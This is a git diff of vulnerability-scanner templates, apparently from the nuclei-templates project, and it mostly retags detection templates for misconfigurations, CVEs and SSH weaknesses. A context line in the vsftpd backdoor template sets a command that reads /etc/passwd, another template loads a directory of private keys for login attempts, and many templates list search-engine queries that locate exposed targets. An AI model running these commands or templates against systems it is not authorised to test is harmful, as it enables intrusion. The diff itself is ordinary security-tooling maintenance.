+++ b/http/miscellaneous/moodle-changelog.yaml
@@ -7,7 +7,7 @@ info:
description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version.
metadata:
max-request: 1
- tags: misc,moodle
+ tags: miscellaneous,misc,moodle
http:
- method: GET
diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml
index e040287a1d..550a607728 100644
--- a/http/miscellaneous/netflix-conductor-version.yaml
+++ b/http/miscellaneous/netflix-conductor-version.yaml
@@ -11,7 +11,7 @@ info:
metadata:
max-request: 2
shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
- tags: tech,netflix,conductor,api,misc
+ tags: miscellaneous,tech,netflix,conductor,api,misc
http:
- method: GET
diff --git a/http/miscellaneous/ntlm-directories.yaml b/http/miscellaneous/ntlm-directories.yaml
index fbf7758778..29ea458a33 100644
--- a/http/miscellaneous/ntlm-directories.yaml
+++ b/http/miscellaneous/ntlm-directories.yaml
@@ -8,7 +8,7 @@ info:
- https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666
metadata:
max-request: 47
- tags: misc,fuzz,windows
+ tags: miscellaneous,misc,fuzz,windows
http:
- raw:
diff --git a/http/miscellaneous/old-copyright.yaml b/http/miscellaneous/old-copyright.yaml
index 52e3fd7454..cd054d900b 100644
--- a/http/miscellaneous/old-copyright.yaml
+++ b/http/miscellaneous/old-copyright.yaml
@@ -7,7 +7,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: GET
diff --git a/http/miscellaneous/options-method.yaml b/http/miscellaneous/options-method.yaml
index f96cdfe247..e23ec8c837 100644
--- a/http/miscellaneous/options-method.yaml
+++ b/http/miscellaneous/options-method.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 1
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: OPTIONS
diff --git a/http/miscellaneous/rdap-whois.yaml b/http/miscellaneous/rdap-whois.yaml
index a9b75fcaf9..46c9a1ad71 100644
--- a/http/miscellaneous/rdap-whois.yaml
+++ b/http/miscellaneous/rdap-whois.yaml
@@ -16,7 +16,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: whois,rdap,osint,misc
+ tags: miscellaneous,whois,rdap,osint,misc
http:
- method: GET
diff --git a/http/miscellaneous/robots-txt-endpoint.yaml b/http/miscellaneous/robots-txt-endpoint.yaml
index c0239c46d8..ffd95964cd 100644
--- a/http/miscellaneous/robots-txt-endpoint.yaml
+++ b/http/miscellaneous/robots-txt-endpoint.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 2
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: GET
diff --git a/http/miscellaneous/robots-txt.yaml b/http/miscellaneous/robots-txt.yaml
index 7d0730598d..9a34a3ec64 100644
--- a/http/miscellaneous/robots-txt.yaml
+++ b/http/miscellaneous/robots-txt.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 1
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: GET
diff --git a/http/miscellaneous/security-txt.yaml b/http/miscellaneous/security-txt.yaml
index a3d6463bb9..90193a1063 100644
--- a/http/miscellaneous/security-txt.yaml
+++ b/http/miscellaneous/security-txt.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 2
shodan-query: http.securitytxt:contact http.status:200
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: GET
diff --git a/http/miscellaneous/sitemap-detect.yaml b/http/miscellaneous/sitemap-detect.yaml
index d7069a6c82..3a392de9b9 100644
--- a/http/miscellaneous/sitemap-detect.yaml
+++ b/http/miscellaneous/sitemap-detect.yaml
@@ -10,7 +10,7 @@ info:
verified: true
max-request: 3
google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd
- tags: misc,generic,sitemap
+ tags: miscellaneous,misc,generic,sitemap
http:
- method: GET
diff --git a/http/miscellaneous/spnego-detect.yaml b/http/miscellaneous/spnego-detect.yaml
index 7543ca62f4..e131286284 100644
--- a/http/miscellaneous/spnego-detect.yaml
+++ b/http/miscellaneous/spnego-detect.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 1
shodan-query: 'www-authenticate: negotiate'
- tags: misc,windows,spnego
+ tags: miscellaneous,misc,windows,spnego
http:
- method: GET
diff --git a/http/miscellaneous/x-recruiting-header.yaml b/http/miscellaneous/x-recruiting-header.yaml
index 56b64aea2a..47be49c8f9 100644
--- a/http/miscellaneous/x-recruiting-header.yaml
+++ b/http/miscellaneous/x-recruiting-header.yaml
@@ -11,7 +11,7 @@ info:
verified: true
max-request: 1
shodan-query: "X-Recruiting:"
- tags: misc,hiring,jobs,employment,generic
+ tags: miscellaneous,misc,hiring,jobs,employment,generic
http:
- method: GET
diff --git a/http/miscellaneous/xml-schema-detect.yaml b/http/miscellaneous/xml-schema-detect.yaml
index 5d048a0dd2..d89b728b37 100644
--- a/http/miscellaneous/xml-schema-detect.yaml
+++ b/http/miscellaneous/xml-schema-detect.yaml
@@ -6,7 +6,7 @@ info:
severity: info
metadata:
max-request: 1
- tags: misc,generic
+ tags: miscellaneous,misc,generic
http:
- method: GET
diff --git a/http/misconfiguration/aws/cdn-cache-poisoning.yaml b/http/misconfiguration/aws/cdn-cache-poisoning.yaml
index 9909c511a4..8b001a8088 100644
--- a/http/misconfiguration/aws/cdn-cache-poisoning.yaml
+++ b/http/misconfiguration/aws/cdn-cache-poisoning.yaml
@@ -13,7 +13,7 @@ info:
metadata:
verified: true
shodan-query: "X-Amz-Server-Side-Encryption"
- tags: cache,aws,poisoning,cdn
+ tags: misconfig,cache,aws,poisoning,cdn
variables:
string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}"
diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml
index 8a8675129c..dcdb5d3dcc 100644
--- a/http/misconfiguration/clickhouse-unauth-api.yaml
+++ b/http/misconfiguration/clickhouse-unauth-api.yaml
@@ -12,7 +12,7 @@ info:
max-request: 1
shodan-query: "X-ClickHouse-Summary"
fofa-query: "X-ClickHouse-Summary"
- tags: clickhouse,unauth,disclosure
+ tags: misconfig,clickhouse,unauth,disclosure
http:
- method: GET
diff --git a/http/misconfiguration/dlink-config-dump.yaml b/http/misconfiguration/dlink-config-dump.yaml
index 3ee999558f..0b8c9b723c 100644
--- a/http/misconfiguration/dlink-config-dump.yaml
+++ b/http/misconfiguration/dlink-config-dump.yaml
@@ -12,7 +12,7 @@ info:
metadata:
max-request: 1
shodan-query: title:"D-LINK"
- tags: config,dump,dlink,auth-bypass,disclosure
+ tags: misconfig,config,dump,dlink,auth-bypass,disclosure
http:
- method: GET
diff --git a/http/misconfiguration/exposed-service-now.yaml b/http/misconfiguration/exposed-service-now.yaml
index 2d8ac2aae1..b3eeb36846 100644
--- a/http/misconfiguration/exposed-service-now.yaml
+++ b/http/misconfiguration/exposed-service-now.yaml
@@ -10,7 +10,7 @@ info:
- https://github.com/leo-hildegarde/SnowDownKB/
metadata:
max-request: 1
- tags: servicenow
+ tags: misconfig,servicenow
http:
- method: GET
diff --git a/http/misconfiguration/exposed-sqlite-manager.yaml b/http/misconfiguration/exposed-sqlite-manager.yaml
index c8f2dd6f12..aabf4eeffa 100644
--- a/http/misconfiguration/exposed-sqlite-manager.yaml
+++ b/http/misconfiguration/exposed-sqlite-manager.yaml
@@ -9,7 +9,7 @@ info:
- https://www.exploit-db.com/ghdb/5003
metadata:
max-request: 3
- tags: misconfig,sqlite,edb
+ tags: misconfig,sqlite,edb,sqli
http:
- method: GET
diff --git a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml
index 7dbebff007..1a8fd61a34 100644
--- a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml
+++ b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml
@@ -14,7 +14,7 @@ info:
shodan-query: title:"H2O Flow"
verified: true
max-request: 1
- tags: h2o-3,h2o,info-leak,lfi
+ tags: misconfig,h2o-3,h2o,info-leak,lfi
http:
- raw:
diff --git a/http/misconfiguration/installer/zenphoto-setup.yaml b/http/misconfiguration/installer/zenphoto-setup.yaml
index 1cabb3915b..4b10c13cd5 100644
--- a/http/misconfiguration/installer/zenphoto-setup.yaml
+++ b/http/misconfiguration/installer/zenphoto-setup.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 4
shodan-query: title:"Zenphoto install"
- tags: panel,zenphoto,setup,installer
+ tags: misconfig,panel,zenphoto,setup,installer
http:
- method: GET
diff --git a/http/misconfiguration/misconfigured-docker.yaml b/http/misconfiguration/misconfigured-docker.yaml
index 6d9ae15ab9..fb6d61720b 100644
--- a/http/misconfiguration/misconfigured-docker.yaml
+++ b/http/misconfiguration/misconfigured-docker.yaml
@@ -9,7 +9,7 @@ info:
- https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html
metadata:
max-request: 1
- tags: docker,unauth,devops
+ tags: misconfig,docker,unauth,devops
http:
- method: GET
diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml
index 40b5d73d48..66df0b8bff 100644
--- a/http/misconfiguration/nacos/nacos-create-user.yaml
+++ b/http/misconfiguration/nacos/nacos-create-user.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 3
shodan-query: title:"Nacos"
- tags: nacos,unauth,bypass,instrusive
+ tags: misconfig,nacos,unauth,bypass,instrusive
http:
- raw:
diff --git a/http/misconfiguration/php/php-composer-binary.yaml b/http/misconfiguration/php/php-composer-binary.yaml
index bc6e0b2a51..177b850e21 100644
--- a/http/misconfiguration/php/php-composer-binary.yaml
+++ b/http/misconfiguration/php/php-composer-binary.yaml
@@ -11,7 +11,7 @@ info:
metadata:
max-request: 1
verified: true
- tags: php,composer,exposure
+ tags: misconfig,php,composer,exposure
http:
- method: GET
diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml
index d08069d5ca..3392f8f28c 100644
--- a/http/misconfiguration/selenium-exposure.yaml
+++ b/http/misconfiguration/selenium-exposure.yaml
@@ -13,7 +13,7 @@ info:
verified: true
max-request: 1
shodan-query: "/wd/hub"
- tags: selenium,misconfiguration,rce,chromium
+ tags: misconfig,selenium,misconfiguration,rce,chromium
http:
- method: GET
diff --git a/http/misconfiguration/tls-sni-proxy.yaml b/http/misconfiguration/tls-sni-proxy.yaml
index a399c390c9..3442302195 100644
--- a/http/misconfiguration/tls-sni-proxy.yaml
+++ b/http/misconfiguration/tls-sni-proxy.yaml
@@ -9,7 +9,7 @@ info:
- https://www.bamsoftware.com/computers/sniproxy/
metadata:
max-request: 1
- tags: ssrf,oast,tls,sni,proxy
+ tags: misconfig,ssrf,oast,tls,sni,proxy
http:
- raw:
diff --git a/http/misconfiguration/tomcat-stacktraces.yaml b/http/misconfiguration/tomcat-stacktraces.yaml
index 876539da2d..8dc0dcc610 100644
--- a/http/misconfiguration/tomcat-stacktraces.yaml
+++ b/http/misconfiguration/tomcat-stacktraces.yaml
@@ -10,7 +10,7 @@ info:
verified: true
max-request: 1
shodan-query: title:"Apache Tomcat"
- tags: tech,tomcat,apache
+ tags: misconfig,tech,tomcat,apache
http:
- method: GET
diff --git a/http/misconfiguration/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml
index 29f3b9911a..2a67b260c3 100644
--- a/http/misconfiguration/unauth-temporal-web-ui.yaml
+++ b/http/misconfiguration/unauth-temporal-web-ui.yaml
@@ -15,7 +15,7 @@ info:
verified: "true"
max-request: 2
shodan-query: http.favicon.hash:557327884
- tags: temporal,unauth
+ tags: misconfig,temporal,unauth
http:
- method: GET
diff --git a/http/misconfiguration/woodwing-git.yaml b/http/misconfiguration/woodwing-git.yaml
index 4f701c1528..ddc40574c6 100644
--- a/http/misconfiguration/woodwing-git.yaml
+++ b/http/misconfiguration/woodwing-git.yaml
@@ -9,7 +9,7 @@ info:
metadata:
shodan-query: http.title:"WoodWing Studio Server"
fofa-query: title=="WoodWing Studio Server"
- tags: woodwing,git,config
+ tags: misconfig,woodwing,git,config
http:
- method: GET
diff --git a/http/misconfiguration/woodwing-phpinfo.yaml b/http/misconfiguration/woodwing-phpinfo.yaml
index 2cc72aa7a2..c50553aa81 100644
--- a/http/misconfiguration/woodwing-phpinfo.yaml
+++ b/http/misconfiguration/woodwing-phpinfo.yaml
@@ -9,7 +9,7 @@ info:
metadata:
shodan-query: http.title:"WoodWing Studio Server"
fofa-query: title=="WoodWing Studio Server"
- tags: woodwing,phpinfo
+ tags: misconfig,woodwing,phpinfo
http:
- method: GET
diff --git a/http/misconfiguration/zabbix-dashboards-access.yaml b/http/misconfiguration/zabbix-dashboards-access.yaml
index 77c238da9d..7f7e3849f9 100644
--- a/http/misconfiguration/zabbix-dashboards-access.yaml
+++ b/http/misconfiguration/zabbix-dashboards-access.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-522
metadata:
max-request: 1
- tags: edb,packetstorm,zabbix,unauth,misconfig
+ tags: edb,packetstorm,zabbix,unauth,misconfig,xss
http:
- method: GET
diff --git a/http/misconfiguration/zenphoto-sensitive-info.yaml b/http/misconfiguration/zenphoto-sensitive-info.yaml
index 389024f746..107c3d513b 100644
--- a/http/misconfiguration/zenphoto-sensitive-info.yaml
+++ b/http/misconfiguration/zenphoto-sensitive-info.yaml
@@ -7,7 +7,7 @@ info:
description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure
metadata:
max-request: 4
- tags: unauth
+ tags: misconfig,unauth
http:
- method: GET
diff --git a/http/vulnerabilities/kkfileview-ssrf.yaml b/http/vulnerabilities/kkfileview-ssrf.yaml
index 9f8993ea00..fe49c1d523 100644
--- a/http/vulnerabilities/kkfileview-ssrf.yaml
+++ b/http/vulnerabilities/kkfileview-ssrf.yaml
@@ -18,7 +18,7 @@ info:
product: kkfileview
shodan-query: http.html:"kkFileView"
fofa-query: app="kkFileView"
- tags: ssrf,kkfileview
+ tags: ssrf,kkfileview,keking
http:
- method: GET
diff --git a/http/vulnerabilities/other/eris-xss.yaml b/http/vulnerabilities/other/eris-xss.yaml
index 779b36574f..949a4acfe2 100644
--- a/http/vulnerabilities/other/eris-xss.yaml
+++ b/http/vulnerabilities/other/eris-xss.yaml
@@ -15,7 +15,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: cve,cve2022,xss,eris
+ tags: cve,cve2022,xss,eris,sqli
http:
- raw:
diff --git a/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml
index 85d8f11be9..7252d8c51b 100644
--- a/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml
+++ b/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-22
metadata:
max-request: 2
- tags: packetstorm,geowebserver,lfi
+ tags: packetstorm,geowebserver,lfi,xss
http:
- method: GET
diff --git a/http/vulnerabilities/other/mcafee-epo-rce.yaml b/http/vulnerabilities/other/mcafee-epo-rce.yaml
index b517b309c3..060ac643a6 100644
--- a/http/vulnerabilities/other/mcafee-epo-rce.yaml
+++ b/http/vulnerabilities/other/mcafee-epo-rce.yaml
@@ -10,7 +10,7 @@ info:
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
metadata:
max-request: 1
- tags: mcafee,rce,
+ tags: mcafee,rce
http:
- method: GET
diff --git a/http/vulnerabilities/other/nextjs-redirect.yaml b/http/vulnerabilities/other/nextjs-redirect.yaml
index 6b58430e4b..2914db3bc4 100644
--- a/http/vulnerabilities/other/nextjs-redirect.yaml
+++ b/http/vulnerabilities/other/nextjs-redirect.yaml
@@ -16,7 +16,7 @@ info:
metadata:
max-request: 1
shodan-query: html:"/_next/static"
- tags: redirect,nextjs
+ tags: redirect,nextjs,xss
http:
- method: GET
diff --git a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml
index 2d74efe58f..c4d11ed485 100644
--- a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml
+++ b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-22
metadata:
max-request: 1
- tags: bscw,orbiteam,lfi,unauth,packetstorm
+ tags: bscw,orbiteam,lfi,unauth,packetstorm,xss
http:
- method: GET
diff --git a/http/vulnerabilities/other/pbootcms-database-file-download.yaml b/http/vulnerabilities/other/pbootcms-database-file-download.yaml
index f392eb91a9..2776d61634 100644
--- a/http/vulnerabilities/other/pbootcms-database-file-download.yaml
+++ b/http/vulnerabilities/other/pbootcms-database-file-download.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-89
metadata:
max-request: 1
- tags: pbootcms,db,exposure,database,sqlite
+ tags: pbootcms,db,exposure,database,sqlite,sqli
http:
- method: GET
diff --git a/http/vulnerabilities/other/vpms-auth-bypass.yaml b/http/vulnerabilities/other/vpms-auth-bypass.yaml
index eb7d7d7ad2..61422e0400 100644
--- a/http/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/http/vulnerabilities/other/vpms-auth-bypass.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-89
metadata:
max-request: 1
- tags: auth-bypass,edb
+ tags: auth-bypass,edb,sqli
http:
- raw:
diff --git a/http/vulnerabilities/other/zms-auth-bypass.yaml b/http/vulnerabilities/other/zms-auth-bypass.yaml
index 9b611d8841..540f91a11c 100644
--- a/http/vulnerabilities/other/zms-auth-bypass.yaml
+++ b/http/vulnerabilities/other/zms-auth-bypass.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-89
metadata:
max-request: 1
- tags: edb,auth-bypass,packetstorm,zms
+ tags: edb,auth-bypass,packetstorm,zms,sqli
http:
- raw:
diff --git a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
index aa08d06509..8280921fd1 100644
--- a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
+++ b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
metadata:
max-request: 1
- tags: thinkphp,vulhub
+ tags: thinkphp,vulhub,sqli
http:
- method: GET
diff --git a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
index dfd4444245..c2c2e205cb 100644
--- a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
+++ b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml
@@ -16,7 +16,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: xss,,wp,wpscan,wordpress,wp-plugin
+ tags: xss,wp,wpscan,wordpress,wp-plugin
http:
- method: GET
diff --git a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml
index 9a62c72cbc..9dcb888cce 100644
--- a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml
@@ -15,7 +15,7 @@ info:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/"
- tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards
+ tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards,xss
http:
- raw:
diff --git a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
index 9091f13594..ef71613336 100644
--- a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
+++ b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-22
metadata:
max-request: 1
- tags: wordpress,wp-theme,lfi,wordpress,tinymce
+ tags: wordpress,wp-theme,lfi,tinymce
http:
- method: GET
diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml
index 2b8f5c040c..89f1f56e29 100644
--- a/javascript/cves/2016/CVE-2016-8706.yaml
+++ b/javascript/cves/2016/CVE-2016-8706.yaml
@@ -25,7 +25,7 @@ info:
vendor: memcached
product: memcached
verfied: true
- tags: cve,cve2016,rce,js,memcached
+ tags: cve2016,cve,js,rce,memcached
javascript:
- code: |
diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml
index 3988ad5526..7cdb98132f 100644
--- a/javascript/cves/2023/CVE-2023-34039.yaml
+++ b/javascript/cves/2023/CVE-2023-34039.yaml
@@ -29,7 +29,7 @@ info:
verified: true
vendor: vmware
product: aria_operations_for_networks
- tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize
+ tags: cve,js,cve2023,packetstorm,vmware,aria,rce,fuzz,vrealize
variables:
keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml
index 1345794b64..482c2b8afa 100644
--- a/javascript/cves/2023/CVE-2023-46604.yaml
+++ b/javascript/cves/2023/CVE-2023-46604.yaml
@@ -27,7 +27,7 @@ info:
vendor: apache
product: activemq
shodan-query: product:"ActiveMQ OpenWire Transport"
- tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev
+ tags: cve,js,cve2023,network,rce,apache,activemq,deserialization,kev
variables:
prefix: "1f00000000000000000001010042"
diff --git a/javascript/detection/oracle-tns-listener.yaml b/javascript/detection/oracle-tns-listener.yaml
index 293b3fe371..4fb0633f8a 100644
--- a/javascript/detection/oracle-tns-listener.yaml
+++ b/javascript/detection/oracle-tns-listener.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 1
shodan-query: product:"Oracle TNS Listener"
- tags: js,oracle,tns,network
+ tags: js,detect,oracle,tns,network
javascript:
- code: |
diff --git a/javascript/detection/ssh-auth-methods.yaml b/javascript/detection/ssh-auth-methods.yaml
index 0df9ed3b4c..b1a1af7062 100644
--- a/javascript/detection/ssh-auth-methods.yaml
+++ b/javascript/detection/ssh-auth-methods.yaml
@@ -11,7 +11,7 @@ info:
metadata:
max-request: 1
shodan-query: product:"OpenSSH"
- tags: ssh,js,enum,network
+ tags: js,detect,ssh,enum,network
javascript:
- code: |
diff --git a/javascript/enumeration/ssh/obsolete-ssh-version.yaml b/javascript/enumeration/ssh/obsolete-ssh-version.yaml
index 46ebccf73e..4082207f60 100644
--- a/javascript/enumeration/ssh/obsolete-ssh-version.yaml
+++ b/javascript/enumeration/ssh/obsolete-ssh-version.yaml
@@ -9,7 +9,7 @@ info:
metadata:
max-request: 2
shodan-query: port:22
- tags: js,ssh,network
+ tags: enum,js,ssh,network
javascript:
- pre-condition: |
diff --git a/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml b/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml
index 7082bf3fdf..e2b6abab0c 100644
--- a/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml
+++ b/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 2
shodan-query: product:"OpenSSH"
- tags: js,ssh,misconfig,network
+ tags: js,enum,ssh,misconfig,network
javascript:
- pre-condition: |
diff --git a/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml b/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml
index ab45dbe3e5..dc75357933 100644
--- a/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml
+++ b/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 2
shodan-query: product:"OpenSSH"
- tags: js,ssh,misconfig,network
+ tags: js,enum,ssh,misconfig,network
javascript:
- pre-condition: |
diff --git a/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml b/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml
index ab617aae12..a22e78b0b2 100644
--- a/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml
+++ b/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 2
shodan-query: product:"OpenSSH"
- tags: js,ssh,misconfig,network
+ tags: enum,js,ssh,misconfig,network
javascript:
- pre-condition: |
diff --git a/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml b/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml
index 5fa66381ca..fc83b35197 100644
--- a/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml
+++ b/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 2
shodan-query: product:"OpenSSH"
- tags: js,ssh,misconfig,network
+ tags: js,enum,ssh,misconfig,network
javascript:
- pre-condition: |
diff --git a/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml b/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml
index c5909cb18e..628c05030a 100644
--- a/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml
+++ b/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 2
shodan-query: product:"OpenSSH"
- tags: js,ssh,misconfig,network
+ tags: js,enum,ssh,misconfig,network
javascript:
- pre-condition: |
diff --git a/javascript/enumeration/ssh/ssh-weak-public-key.yaml b/javascript/enumeration/ssh/ssh-weak-public-key.yaml
index 3eb7db5a75..654db50011 100644
--- a/javascript/enumeration/ssh/ssh-weak-public-key.yaml
+++ b/javascript/enumeration/ssh/ssh-weak-public-key.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 2
shodan-query: product:"OpenSSH"
- tags: js,ssh,misconfig,network
+ tags: enum,js,ssh,misconfig,network
variables:
ecdsa_bit: '256' # 256 bytes = 2048 bits
diff --git a/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml b/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml
index f883f976df..3bf936f15d 100644
--- a/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml
+++ b/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml
@@ -12,7 +12,7 @@ info:
verified: true
max-request: 2
shodan-query: product:"OpenSSH"
- tags: js,ssh,misconfig,network
+ tags: js,enum,ssh,misconfig,network
javascript:
- pre-condition: |
diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml
index 2468298527..2c096f17be 100644
--- a/network/cves/2001/CVE-2001-1473.yaml
+++ b/network/cves/2001/CVE-2001-1473.yaml
@@ -22,7 +22,7 @@ info:
max-request: 1
product: ssh
vendor: ssh
- tags: cve,cve2001,network,ssh,openssh
+ tags: network,cve2001,cve,ssh,openssh
tcp:
- host:
- "{{Hostname}}"
diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml
index ec8cf0aa8f..ee4d8ed479 100644
--- a/network/cves/2011/CVE-2011-2523.yaml
+++ b/network/cves/2011/CVE-2011-2523.yaml
@@ -29,7 +29,7 @@ info:
vendor: vsftpd_project
product: vsftpd
shodan-query: product:"vsftpd"
- tags: cve,cve2011,network,vsftpd,ftp,backdoor
+ tags: cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project
variables:
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
tcp:
diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml
index afe13ceb48..30745116a5 100644
--- a/network/cves/2015/CVE-2015-3306.yaml
+++ b/network/cves/2015/CVE-2015-3306.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
product: proftpd
vendor: proftpd
- tags: cve,cve2015,ftp,rce,network,proftpd,edb
+ tags: cve2015,cve,network,ftp,rce,proftpd,edb
tcp:
- host:
- "{{Hostname}}"
diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml
index 35d62d50ff..a9132a831a 100644
--- a/network/cves/2016/CVE-2016-2004.yaml
+++ b/network/cves/2016/CVE-2016-2004.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: hp
product: data_protector
- tags: cve,cve2016,network,iot,hp,rce,edb
+ tags: cve2016,network,cve,iot,hp,rce,edb
tcp:
- host:
- "{{Hostname}}"
diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml
index 2a35c07609..10d5e26cc9 100644
--- a/network/cves/2016/CVE-2016-3510.yaml
+++ b/network/cves/2016/CVE-2016-3510.yaml
@@ -20,7 +20,7 @@ info:
epss-score: 0.0162
metadata:
verified: true
- tags: cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network
+ tags: cve2016,network,cve,oracle,weblogic,t3,rce,oast,deserialization
variables:
